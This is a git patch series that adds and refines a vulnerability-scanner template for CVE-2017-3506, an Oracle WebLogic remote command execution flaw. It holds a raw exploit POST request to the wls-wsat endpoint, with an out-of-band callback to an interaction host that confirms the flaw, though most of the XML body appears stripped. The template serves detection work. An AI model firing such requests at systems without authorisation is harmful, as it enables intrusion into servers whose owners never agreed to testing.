From 6eae4191d69b15da5e1b5565c52005ebfbc51498 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 26 Apr 2021 15:18:57 +0530
Subject: [PATCH 1/4] Added CVE-2017-3506
---
cves/2017/CVE-2017-3506.yaml | 52 ++++++++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+)
create mode 100644 cves/2017/CVE-2017-3506.yaml
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
new file mode 100644
index 0000000000..3176b7ec9b
--- /dev/null
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -0,0 +1,52 @@
+id: CVE-2017-3506
+
+info:
+ name: Oracle Weblogic Remote OS Command Execution
+ author: pdteam
+ description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
+ severity: high
+ tags: cve,cve2017,weblogic,oracle,rce,oob
+ reference: |
+ - https://hackerone.com/reports/810778
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+
+requests:
+ - raw:
+ - |
+ POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
+ Content-Type: text/xml;charset=UTF-8
+ Content-Length: 873
+
+
+
+
+
+
+
+
+
+
+
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "dns"
From 8ca815d1919ab60422d6cd14df4246cdb62f3998 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 26 Apr 2021 15:20:04 +0530
Subject: [PATCH 2/4] Update CVE-2017-3506.yaml
---
cves/2017/CVE-2017-3506.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 3176b7ec9b..5bbe72c13f 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -1,7 +1,7 @@
id: CVE-2017-3506
info:
- name: Oracle Weblogic Remote OS Command Execution
+ name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
From 68b06c50a44a7c91dfc4b38f7f71fc86f5c1080b Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 26 Apr 2021 21:16:27 +0530
Subject: [PATCH 3/4] Update CVE-2017-3506.yaml
---
cves/2017/CVE-2017-3506.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 5bbe72c13f..40a376d282 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -47,6 +47,6 @@ requests:
matchers:
- type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
From 641e125c79eb5328dc8192e645ce5a362b947798 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 2 May 2021 18:51:04 +0530
Subject: [PATCH 4/4] improved payload
---
cves/2017/CVE-2017-3506.yaml | 36 ++++++++++++++----------------------
1 file changed, 14 insertions(+), 22 deletions(-)
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 40a376d282..7ccc09a393 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -22,28 +22,20 @@ requests:
Content-Length: 873
-
-
-
-
-
-
-
-
-
+
+
+
+
+ http://{{interactsh-url}}
+
+
+
+
+
+
+
+
+
matchers:
- type: word